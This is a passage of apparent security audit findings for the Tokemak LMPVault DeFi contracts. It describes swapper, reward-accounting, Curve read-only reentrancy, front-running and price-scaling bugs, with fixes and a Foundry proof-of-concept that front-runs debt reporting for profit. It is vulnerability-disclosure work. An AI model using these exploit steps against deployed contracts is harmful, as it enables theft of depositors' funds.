asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params,\\n uint256 totalBalanceToLiquidate,\\n uint256[] memory vaultsBalances\\n) private {\\n uint256 length = vaultsToLiquidate.length;\\n // the swapper checks that the amount received is greater or equal than the params.buyAmount\\n uint256 amountReceived = IAsyncSwapper(asyncSwapper).swap(params);\\n // // rest of code\\n}\\n```\\n\\nAs you can see the LiquidationRow doesn't transfer the tokens to swapper and swapper doesn't pul them either (swap function here). 
Because of this, the function reverts.\\nI noticed that there is no transfer back to LiquidationRow from the swapper either; tokens can't get in or out.\\nWhen I searched the codebase, I found that the swapper is called in another place using the delegatecall method. That way it can operate on the caller's tokens. The call can be found here - LMPVaultRouter.sol:swapAndDepositToVault. So instead of a missing transfer, the problem is actually in how the swapper is called.
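The call-vs-delegatecall difference can be illustrated with a loose Python analogy (not EVM semantics; a `ctx` dict stands in for whichever contract's token balance the swap code executes against):

```python
class Swapper:
    """Analogy: swap() spends tokens from whatever context it executes in."""
    def swap(self, ctx, amount):
        if ctx["balance"] < amount:
            # What happens today: the swapper contract holds no tokens
            raise RuntimeError("insufficient tokens")
        ctx["balance"] -= amount
        return amount  # assume a 1:1 swap for simplicity

liquidation_row = {"balance": 100}  # reward tokens collected from the vaults
swapper_ctx = {"balance": 0}        # the swapper contract itself holds nothing

swapper = Swapper()
# Regular call: the swapper runs against its OWN balance -> reverts
try:
    swapper.swap(swapper_ctx, 100)
    assert False, "expected revert"
except RuntimeError:
    pass
# delegatecall: the swapper code runs in LiquidationRow's context -> succeeds
assert swapper.swap(liquidation_row, 100) == 100
```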
Change the async swapper call from a normal function call to a low-level delegatecall, the same way it is done in LMPVaultRouter.sol:swapAndDepositToVault.\\nNote that AsyncSwapperMock in LiquidationRow.t.sol is a poorly written mock and should be updated to reflect how the real AsyncSwapper works. It would also be worth updating the test suite for LiquidationRow, because its current state won't catch this: the mock's swap function only mints tokens, so no delegatecall is needed, which is why the tests missed this vulnerability.
Rewards collected through LiquidationRow claimsVaultRewards get stuck in the contract. Liquidation can't be called because it reverts when Swapper tries to work with tokens it doesn't possess.
```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n
When `queueNewRewards` is called, caller could transfer tokens more than it should be
high
Inside `queueNewRewards`, irrespective of whether we're near the start or the end of a reward period, if the accrued rewards are too large relative to the new rewards (queuedRatio is greater than newRewardRatio), the new rewards will be added to the queue (queuedRewards) rather than being immediately distributed.\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n }\\n```\\n\\nHowever, when this function pulls funds from the sender via `safeTransferFrom`, it uses the `newRewards` amount, which has already been increased by `startingQueuedRewards`. If `queuedRewards` was non-zero beforehand, the transferred amount will be wrong.
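A minimal Python sketch of the amount accounting (hypothetical numbers; only the transfer-amount computation is modeled, not the distribution branches):

```python
def queue_new_rewards(new_rewards, queued_rewards):
    """Model the transfer amount computed in MainRewarder.queueNewRewards."""
    starting_new_rewards = new_rewards
    new_rewards += queued_rewards   # newRewards += startingQueuedRewards
    transfer_amount = new_rewards   # bug: safeTransferFrom uses the inflated value
    return transfer_amount, starting_new_rewards

transfer_amount, actual_new = queue_new_rewards(new_rewards=100, queued_rewards=40)
assert transfer_amount == 140  # caller is debited 140 tokens...
assert actual_new == 100       # ...though only 100 are genuinely new
```

The fix is to transfer `starting_new_rewards` (i.e. `startingNewRewards`) instead, so the two values coincide only when the queue was empty.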
Update the transfer to use `startingNewRewards` instead of `newRewards` :\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards // Add the line below\\n= startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number // Remove the line below\\n (periodInBlockFinish // Remove the line below\\n durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n// Remove the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n// Add the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), startingNewRewards);\\n }\\n```\\n
There are two possible issues here:\\nIf `queuedRewards` was previously non-zero and the caller doesn't have enough funds or approval, the call will revert due to this logic error.\\nIf `queuedRewards` was previously non-zero and the caller does have enough funds and approval, more funds than intended will be pulled from the caller (the reward param + `queuedRewards`).
```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n }\\n```\\n
Curve V2 Vaults can be drained because CurveV2CryptoEthOracle can be reentered with WETH tokens
high
`CurveV2CryptoEthOracle.registerPool` takes `checkReentrancy` parameters and this should be True only for pools that have `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` tokens and this is validated here.\\n```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n\\nThis Oracle is meant for Curve V2 pools and the ones I've seen so far use WETH address instead of `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` (like Curve V1) and this applies to all pools listed by Tokemak.\\nFor illustration, I'll use the same pool used to test proper registration. The test is for `CRV_ETH_CURVE_V2_POOL` but this applies to other V2 pools including rETH/ETH. The pool address for `CRV_ETH_CURVE_V2_POOL` is 0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511 while token address is 0xEd4064f376cB8d68F770FB1Ff088a3d0F3FF5c4d.\\nIf you interact with the pool, the coins are: 0 - WETH - 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 1 - CRV - 0xD533a949740bb3306d119CC777fa900bA034cd52\\nSo how can WETH be reentered?! 
Because Curve can accept ETH for WETH pools.\\nA look at the pool again shows that Curve uses python kwargs, and it includes a variable `use_eth` for `exchange`, `add_liquidity`, `remove_liquidity` and `remove_liquidity_one_coin`.\\n```\\ndef exchange(i: uint256, j: uint256, dx: uint256, min_dy: uint256, use_eth: bool = False) -> uint256:\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256, use_eth: bool = False) -> uint256:\\ndef remove_liquidity(_amount: uint256, min_amounts: uint256[N_COINS], use_eth: bool = False):\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256, use_eth: bool = False) -> uint256:\\n```\\n\\nWhen `use_eth` is `true`, the pool takes `msg.value` instead of transferring WETH from the user, and it sends ETH via a raw call instead of transferring WETH to the user.\\nIf a raw call is sent to the user, they can reenter the LMPVault and attack the protocol, and the attack would succeed because CurveV2CryptoEthOracle would not check for reentrancy in getPriceInEth\\n```\\n// Checking for read only reentrancy scenario.\\nif (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n}\\n```\\n\\nA profitable attack that could be used to drain the vault involves:\\nDeposit shares at a fair price\\nRemove liquidity on Curve and call updateDebtReporting in LMPVault during the view-only reentrancy\\nWithdraw shares at an unfair price
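A small Python sketch of the registration gate (addresses copied from the report; `must_check_reentrancy` is an illustrative stand-in for the condition in `registerPool`) shows why a Curve V2 WETH pool is never flagged for reentrancy checks:

```python
ETH_SENTINEL = "0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE"
WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2"
CRV = "0xD533a949740bb3306d119CC777fa900bA034cd52"

def must_check_reentrancy(tokens, sentinel):
    # Stand-in for CurveV2CryptoEthOracle.registerPool's gating condition
    return sentinel in tokens

crv_eth_pool = [WETH, CRV]  # Curve V2 pools list WETH, not the ETH sentinel

# Current check: the pool cannot even be registered with checkReentrancy=True,
# so getPriceInEth never calls claim_admin_fees() for it
assert not must_check_reentrancy(crv_eth_pool, ETH_SENTINEL)
# Suggested fix: compare against WETH instead
assert must_check_reentrancy(crv_eth_pool, WETH)
```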
If CurveV2CryptoEthOracle is meant for CurveV2 pools with WETH (and no 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), then change the ETH address to weth. As far as I can tell Curve V2 uses WETH address for ETH but this needs to be verified.\\n```\\n- if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n+ if (tokens[0] != WETH && tokens[1] != WETH) revert MustHaveEthForReentrancy();\\n```\\n
The protocol could be attacked with price manipulation using Curve read only reentrancy. The consequence would be fatal because `getPriceInEth` is used for evaluating debtValue and this evaluation decides shares and debt that would be burned in a withdrawal. Therefore, an inflated value allows attacker to withdraw too many asset for their shares. This could be abused to drain assets on LMPVault.\\nThe attack is cheap, easy and could be bundled in as a flashloan attack. And it puts the whole protocol at risk cause a large portion of their deposit would be on Curve V2 pools with WETH token.
```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n
updateDebtReporting can be front run, putting all the loss on later withdrawals but taking the profit
high
updateDebtReporting takes a user-supplied array of destinations whose debt to report, so if a destination vault is incurring a loss and is not at the front of the withdrawalQueue, an attacker can update debt only for the destinations that are in profit and withdraw in the same txn. He will exit the vault with a profit; others who withdraw after the legitimate updateDebtReporting txn will suffer an even bigger loss than they should have, as part of the profit that would have offset the loss was taken by the attacker and by protocol fees.\\nPOC-\\nLMPVault has 2000 in deposits: 1000 from alice and 1000 from bob\\nThe vault has invested 1000 in DestinationVault1 and 1000 in DestinationVault2 (no idle, for simple calculations)\\nNow Dv1 gains a profit of 5% (+50 base asset) while Dv2 is at a 10% loss (-100 base asset)\\nSo the vault has a net loss of 50. Now alice calls updateDebtReporting([Dv1]), not including Dv2 in the input array.\\nNow she withdraws her money; the protocol falsely believes there is a profit, takes 20% profit fees (assumed), mints 10 shares for itself, and alice walks away with roughly 1020 assets, incurring no loss\\nNow a legitimate updateDebtReporting txn comes, and bob has to account for the loss\\nTest for POC - add it to the LMPVaultMintingTests contract in LMPVault-Withdraw.t.sol under path test/vault.
run it via the command\\n```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n\\n```\\nfunction test_AvoidTheLoss() public {\\n    // for simplicity's sake, assume the vault keeps nothing idle,\\n    // as it does not affect the attack vector in any way\\n    _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n    _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n    address feeSink = vm.addr(555);\\n    _lmpVault.setFeeSink(feeSink);\\n    _lmpVault.setPerformanceFeeBps(2000); // 20%\\n    address alice = address(789);\\n    uint256 initialBalanceAlice = 1000;\\n    // User is going to deposit 1000 asset\\n    _asset.mint(address(this), 1000);\\n    _asset.approve(address(_lmpVault), 1000);\\n    uint256 shareBalUser = _lmpVault.deposit(1000, address(this));\\n    _underlyerOne.mint(address(this), 500);\\n    _underlyerOne.approve(address(_lmpVault), 500);\\n    _lmpVault.rebalance(\\n        address(_destVaultOne),\\n        address(_underlyerOne),\\n        500,\\n        address(0),\\n        address(_asset),\\n        1000\\n    );\\n    _asset.mint(alice, initialBalanceAlice);\\n    vm.startPrank(alice);\\n    _asset.approve(address(_lmpVault), initialBalanceAlice);\\n    uint256 shareBalAlice = _lmpVault.deposit(initialBalanceAlice, alice);\\n    vm.stopPrank();\\n    // rebalance to 2nd vault\\n    _underlyerTwo.mint(address(this), 1000);\\n    _underlyerTwo.approve(address(_lmpVault), 1000);\\n    _lmpVault.rebalance(\\n        address(_destVaultTwo),\\n        address(_underlyerTwo),\\n        1000,\\n        address(0),\\n        address(_asset),\\n        1000\\n    );\\n    // the second destVault incurs a loss, 10%\\n    _mockRootPrice(address(_underlyerTwo), 0.9 ether);\\n    // the first vault incurs some profit, 5%\\n    // so lmpVault is at a net loss of 50 baseAsset\\n    _mockRootPrice(address(_underlyerOne), 2.1 ether);\\n    // malicious updateDebtReporting by alice\\n    address[] memory alteredDestinations = new address[](1);\\n    alteredDestinations[0] = address(_destVaultOne);\\n    vm.prank(alice);\\n    _lmpVault.updateDebtReporting(alteredDestinations);\\n    // alice withdraws first\\n    vm.prank(alice);\\n    _lmpVault.redeem(shareBalAlice, alice, alice);\\n    uint256 finalBalanceAlice = _asset.balanceOf(alice);\\n    emit log_named_uint("final Balance of alice ", finalBalanceAlice);\\n    // protocol also collects its fees,\\n    // further wrecking the remaining LPs\\n    emit log_named_uint("Fee shares given to feeSink ", _lmpVault.balanceOf(feeSink));\\n    assertGt(finalBalanceAlice, initialBalanceAlice);\\n    assertGt(_lmpVault.balanceOf(feeSink), 0);\\n    // now updateDebtReporting again but for all DVs\\n    _lmpVault.updateDebtReporting(_destinations);\\n    emit log_named_uint("Remaining LPs can only get ", _lmpVault.maxWithdraw(address(this)));\\n    emit log_named_uint("Protocol falsely earned (in base asset)", _lmpVault.maxWithdraw(feeSink));\\n    emit log_named_uint("Vault totalAssets", _lmpVault.totalAssets());\\n    emit log_named_uint("Effective loss taken by LPs", 1000 - _lmpVault.maxWithdraw(address(this)));\\n    emit log_named_uint("Profit for Alice", _asset.balanceOf(alice) - initialBalanceAlice);\\n}\\n```\\n\\nLogs: final Balance of alice: 1019; Fee shares given to feeSink: 10; Remaining LPs can only get: 920; Protocol falsely earned (in base asset): 9; Vault totalAssets: 930; Effective loss taken by LPs: 80; Profit for Alice: 19
updateDebtReporting should not have any input param, should by default update for all added destination vaults
Theft of user funds. Submitting as high as attacker only needs to frontrun a updateDebtReporting txn with malicious input and withdraw his funds.
```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n
Inflated price due to unnecessary precision scaling
high
The `price` at Line 137 below is denominated in 18 decimals, as the `getPriceInEth` function always returns the `price` in 18-decimal precision.\\nThere is no need to scale the accumulated price by 1e18.\\nIt will cause the average price (derived from existing._initAcc) to be inflated significantly.\\nThe numerator will almost always be larger than the denominator (INIT_SAMPLE_COUNT = 18). There is no risk of it rounding to zero, so any scaling is unnecessary.\\nAssume that throughout the initialization process, `getPriceInEth(XYZ)` always returns 2 ETH (2e18). After 18 rounds (INIT_SAMPLE_COUNT == 18) of initialization, `existing._initAcc` will equal 36 ETH (36e18). As such, the `averagePrice` will be as follows:\\n```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n\\n`existing.fastFilterPrice` and `existing.slowFilterPrice` will be set to `2e36` at Lines 157 and 158 below.\\nIn the post-init phase, the `getPriceInEth` function returns 3 ETH (3e18).
Thus, the following code will be executed at Lines 144 and 155 below:\\n```\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, 2e36, 3e18); // SLOW_ALPHA = 645e14; // 0.0645\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, 2e36, 3e18); // FAST_ALPHA = 33e16; // 0.33\\n```\\n\\nAs shown above, the existing filter prices are significantly inflated by a scale of 1e18, which results in the prices being extremely skewed.\\nUsing the fast filter formula, the final fast filter price will be as follows:\\n```\\n((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18\\n((priorValue * (1e18 - 33e16)) + (currentValue * 33e16)) / 1e18\\n((priorValue * 67e16) + (currentValue * 33e16)) / 1e18\\n((2e36 * 67e16) + (3e18 * 33e16)) / 1e18\\n1.34e36 (1340000000000000000 ETH)\\n```\\n\\nThe token is supposed to be worth only around 3 ETH.
However, the fast filter price wrongly determines that it is worth around 1340000000000000000 ETH.\\n```\\nFile: IncentivePricingStats.sol\\n function updatePricingInfo(IRootPriceOracle pricer, address token) internal {\\n..SNIP..\\n uint256 price = pricer.getPriceInEth(token);\\n\\n // update the timestamp no matter what phase we're in\\n existing.lastSnapshot = uint40(block.timestamp);\\n\\n if (existing._initComplete) {\\n // post-init phase, just update the filter values\\n existing.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\n existing.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n } else {\\n // still the initialization phase\\n existing._initCount += 1;\\n existing._initAcc += price;\\n\\n // snapshot count is tracked internally and cannot be manipulated\\n // slither-disable-next-line incorrect-equality\\n if (existing._initCount == INIT_SAMPLE_COUNT) { // @audit-info INIT_SAMPLE_COUNT = 18;\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n }\\n }\\n```\\n
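The arithmetic above can be checked directly in Python using integer fixed-point math (a sketch with the report's example values; `filtered` mirrors `Stats.getFilteredValue`):

```python
INIT_SAMPLE_COUNT = 18
FAST_ALPHA = 33 * 10**16  # 0.33 in 1e18 fixed point

def filtered(alpha, prior, current):
    # Exponentially weighted filter in 1e18 fixed point (Stats.getFilteredValue)
    return (prior * (10**18 - alpha) + current * alpha) // 10**18

init_acc = INIT_SAMPLE_COUNT * 2 * 10**18            # 18 samples at 2 ETH each
buggy_avg = init_acc * 10**18 // INIT_SAMPLE_COUNT   # extra 1e18 scaling (the bug)
fixed_avg = init_acc // INIT_SAMPLE_COUNT            # without the scaling

assert fixed_avg == 2 * 10**18   # 2 ETH, as expected
assert buggy_avg == 2 * 10**36   # inflated by a factor of 1e18

# Post-init update with a true price of 3 ETH
assert filtered(FAST_ALPHA, fixed_avg, 3 * 10**18) == 233 * 10**16  # 2.33 ETH
# The buggy seed dominates: result is ~1.34e36, i.e. ~1.34e18 "ETH"
assert filtered(FAST_ALPHA, buggy_avg, 3 * 10**18) // 10**18 == 1_340_000_000_000_000_000
```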
Remove the 1e18 scaling.\\n```\\nif (existing._initCount == INIT_SAMPLE_COUNT) {\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n// Remove the line below\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n// Add the line below\\n uint256 averagePrice = existing._initAcc / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n}\\n```\\n
The price returned by the stat calculators will be excessively inflated. The purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides incorrect and inflated pricing, it can have multiple implications that lead to losses for the protocol, such as false signals that allow an unprofitable rebalance to be executed.
```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n
Immediately start getting rewards belonging to others after staking
high
Note This issue affects both LMPVault and DV since they use the same underlying reward contract.\\nAssume a new user called Bob mints 100 LMPVault or DV shares. The ERC20's `_mint` function will be called, which will first increase Bob's balance at Line 267 and then trigger the `_afterTokenTransfer` hook at Line 271.\\n```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n\\nThe `_afterTokenTransfer` hook will automatically stake the newly minted shares to the rewarder contracts on behalf of Bob.\\n```\\nFile: LMPVault.sol\\n function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual override {\\n..SNIP..\\n if (to != address(0)) {\\n rewarder.stake(to, amount);\\n }\\n }\\n```\\n\\nWithin the `MainRewarder.stake` function, it will first call the `_updateReward` function at Line 87 to take a snapshot of accumulated rewards. Since Bob is a new user, his accumulated rewards should be zero. However, this turned out to be false due to the bug described in this report.\\n```\\nFile: MainRewarder.sol\\n function stake(address account, uint256 amount) public onlyStakeTracker {\\n _updateReward(account);\\n _stake(account, amount);\\n\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).stake(account, amount);\\n }\\n }\\n```\\n\\nWhen the `_updateReward` function is executed, it will compute Bob's earned rewards. 
It is important to note that at this point, Bob's balance has already been updated to 100 shares in the `stakeTracker` contract, and `userRewardPerTokenPaid[Bob]` is zero.\\nBob's earned reward will be as follows, where $r$ is the rewardPerToken():\\n$$ earned(Bob) = 100\\ {shares \\times (r - 0)} = 100r $$\\nBob immediately accumulated a reward of $100r$ upon staking into the rewarder contract, which is incorrect. Bob could withdraw $100r$ reward tokens that do not belong to him.\\n```\\nFile: AbstractRewarder.sol\\n function _updateReward(address account) internal {\\n uint256 earnedRewards = 0;\\n rewardPerTokenStored = rewardPerToken();\\n lastUpdateBlock = lastBlockRewardApplicable();\\n\\n if (account != address(0)) {\\n earnedRewards = earned(account);\\n rewards[account] = earnedRewards;\\n userRewardPerTokenPaid[account] = rewardPerTokenStored;\\n }\\n\\n emit UserRewardUpdated(account, earnedRewards, rewardPerTokenStored, lastUpdateBlock);\\n }\\n..SNIP..\\n function balanceOf(address account) public view returns (uint256) {\\n return stakeTracker.balanceOf(account);\\n }\\n..SNIP..\\n function earned(address account) public view returns (uint256) {\\n return (balanceOf(account) * (rewardPerToken() - userRewardPerTokenPaid[account]) / 1e18) + rewards[account];\\n }\\n```\\n
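The mis-ordering can be sketched with simplified Synthetix-style accounting. The `SCALE` factor, balances, and the accrued `rewardPerToken` value below are toy assumptions for illustration:

```python
SCALE = 10**18

def earned(balance, reward_per_token, user_paid, accrued):
    # Mirrors AbstractRewarder.earned(): balance * (rpt - paid) / 1e18 + rewards
    return balance * (reward_per_token - user_paid) // SCALE + accrued

reward_per_token_stored = 3 * SCALE  # rewards that accrued before Bob staked

# Bug: ERC20._mint credits Bob's balance BEFORE the rewarder snapshots him,
# so _updateReward sees 100 shares with userRewardPerTokenPaid == 0.
bob_balance_seen = 100 * SCALE
instant_reward = earned(bob_balance_seen, reward_per_token_stored, 0, 0)
print(instant_reward // SCALE)  # 300 -- reward tokens Bob never earned

# Correct order: snapshot first (balance still 0), then credit the stake.
correct_reward = earned(0, reward_per_token_stored, 0, 0)
print(correct_reward)  # 0
```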
Ensure that the balance of the users in the rewarder contract is only incremented after the `_updateReward` function is executed.\\nOne option is to track the balance of the staker and total supply internally within the rewarder contract and avoid reading the states in the `stakeTracker` contract, commonly seen in many reward contracts.\\n```\\nFile: AbstractRewarder.sol\\nfunction balanceOf(address account) public view returns (uint256) {\\n// Remove the line below\\n return stakeTracker.balanceOf(account);\\n// Add the line below\\n return _balances[account];\\n}\\n```\\n\\n```\\nFile: AbstractRewarder.sol\\nfunction _stake(address account, uint256 amount) internal {\\n Errors.verifyNotZero(account, "account");\\n Errors.verifyNotZero(amount, "amount");\\n \\n// Add the line below\\n _totalSupply // Add the line below\\n= amount\\n// Add the line below\\n _balances[account] // Add the line below\\n= amount\\n\\n emit Staked(account, amount);\\n}\\n```\\n
Loss of reward tokens for the vault shareholders.
```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n
Differences between actual and cached total assets can be arbitraged
high
The actual total amount of assets that are owned by a LMPVault on-chain can be derived via the following formula:\\n$$ totalAssets_{actual} = \\sum_{n=1}^{x}debtValue(DV_n) $$\\nWhen `LMPVault.totalAssets()` function is called, it returns the cached total assets of the LMPVault instead.\\n$$ totalAssets_{cached} = totalIdle + totalDebt $$\\n```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n\\nThus, the $totalAssets_{cached}$ will deviate from $totalAssets_{actual}$. This difference could be arbitraged or exploited by malicious users for their gain.\\nCertain actions such as `previewDeposit`, `previewMint`, `previewWithdraw,` and `previewRedeem` functions rely on the $totalAssets_{cached}$ value while other actions such as `_withdraw` and `_calcUserWithdrawSharesToBurn` functions rely on $totalAssets_{actual}$ value.\\nThe following shows one example of the issue.\\nThe `previewDeposit(assets)` function computed the number of shares to be received after depositing a specific amount of assets:\\n$$ shareReceived = \\frac{assets_{deposited}}{totalAssets_{cached}} \\times totalSupply $$\\nAssume that $totalAssets_{cached} < totalAssets_{actual}$, and the values of the variables are as follows:\\n$totalAssets_{cached}$ = 110 WETH\\n$totalAssets_{actual}$ = 115 WETH\\n$totalSupply$ = 100 shares\\nAssume Bob deposited 10 WETH when the total assets are 110 WETH (when $totalAssets_{cached} < totalAssets_{actual}$), he would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{110 ETH} \\times 100e18\\ shares \\ &= 9.090909091e18\\ shares \\end{align} $$\\nIf a user deposited 10 WETH while the total assets are updated to the actual worth of 115 WETH (when $totalAssets_{cached} == totalAssets_{actual}$, they would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{115 ETH} \\times 100e18\\ shares \\ &= 8.695652174e18\\ shares \\ \\end{align} $$\\nTherefore, Bob is 
receiving more shares than expected.\nIf Bob redeems all his ~9.09 shares after the $totalAssets_{cached}$ has been updated to $totalAssets_{actual}$, he will receive 10.417 WETH back.\n$$ \begin{align} assetsReceived &= \frac{9.090909091e18\ shares}{(100e18 + 9.090909091e18)\ shares} \times (115 + 10)\ ETH \ &= \frac{9.090909091e18\ shares}{109.090909091e18\ shares} \times 125\ ETH \ &= 10.41666667\ ETH \end{align} $$\nBob profits 0.417 WETH simply by arbitraging the difference between the cached and actual values of the total assets. Bob's gain is the loss of other vault shareholders.\nThe $totalAssets_{cached}$ can be updated to $totalAssets_{actual}$ by calling the permissionless `LMPVault.updateDebtReporting` function. Alternatively, one could also perform a sandwich attack against the `LMPVault.updateDebtReporting` function by front-running it to take advantage of the lower-than-expected price or NAV/share, and back-running it to sell the shares when the price or NAV/share rises after the update.\nOne could also reverse the attack order, where an attacker withdraws at a higher-than-expected price or NAV/share, performs an update on the total assets, and deposits at a lower price or NAV/share.
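The arbitrage above can be verified with exact fractions (the 1e18 share scaling cancels out, so plain share counts suffice):

```python
from fractions import Fraction as F

total_supply = F(100)                          # existing shares
cached_assets, actual_assets = F(110), F(115)  # WETH
deposit = F(10)                                # WETH

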